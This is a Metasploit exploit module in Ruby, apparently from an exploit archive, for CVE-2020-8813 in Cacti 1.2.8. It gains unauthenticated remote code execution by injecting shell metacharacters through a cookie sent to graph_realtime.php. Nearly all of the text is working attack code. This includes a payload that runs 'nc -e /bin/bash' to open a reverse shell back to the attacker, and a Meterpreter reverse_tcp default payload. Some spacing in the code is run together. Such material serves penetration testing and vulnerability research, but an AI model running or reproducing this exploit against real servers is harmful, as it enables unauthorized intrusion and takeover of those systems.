# Exploit Title: Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)# Date: 2020-02-29# Exploit Author: Lucas Amorim (sh286)s# CVE: CVE-2020-8813# Vendor Homepage: https://cacti.net/# Version: v1.2.8# Tested on: Linux### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##classMetasploitModule< Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
definitialize(info ={})super(update_info(info,'Name'=>'Cacti v1.2.8 Unauthenticated Remote Code Execution','Description'=>%q{graph_realtime.php in Cacti 1.2.8 allows remote attackers to
execute arbitrary OS commands via shell metacharacters in a cookie,if a guest user has
the graph real-time privilege.},'Author'=>['Lucas Amorim '# MSF module],'License'=> MSF_LICENSE,'Platform'=>'php','References'=>[['CVE','2020-8813']],'DisclosureDate'=>'Feb 21 2020','Privileged'=> true,'DefaultOptions'=>{'PAYLOAD'=>'php/meterpreter/reverse_tcp','SSL'=> true,},'Targets'=>[['Automatic',{}]],'DefaultTarget'=>0))
register_options([
Opt::RPORT(443),
OptString.new('RPATH',[ false,"path to cacti",""])])
deregister_options('VHOST')
end
def check
res = send_request_raw('method'=>'GET','uri'=>"#{datastore['RPATH']}/graph_realtime.php?action=init")if res && res.code ==200return Exploit::CheckCode::Vulnerable
elsereturn Exploit::CheckCode::Safe
end
end
defsend_payload()
exec_payload=(";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s"%[datastore['LHOST'], datastore['LPORT']])
send_request_raw('uri'=>"#{datastore['RPATH']}/graph_realtime.php?action=init",'method'=>'GET','cookie'=>"Cacti=#{Rex::Text.uri_encode(exec_payload, mode = 'hex-normal')}")
end
def exploit
if check == Exploit::CheckCode::Vulnerable
print_good("Target seems to be a vulnerable")
send_payload()else
print_error("Target does not seem to be vulnerable. Will exit now...")
end
end
end
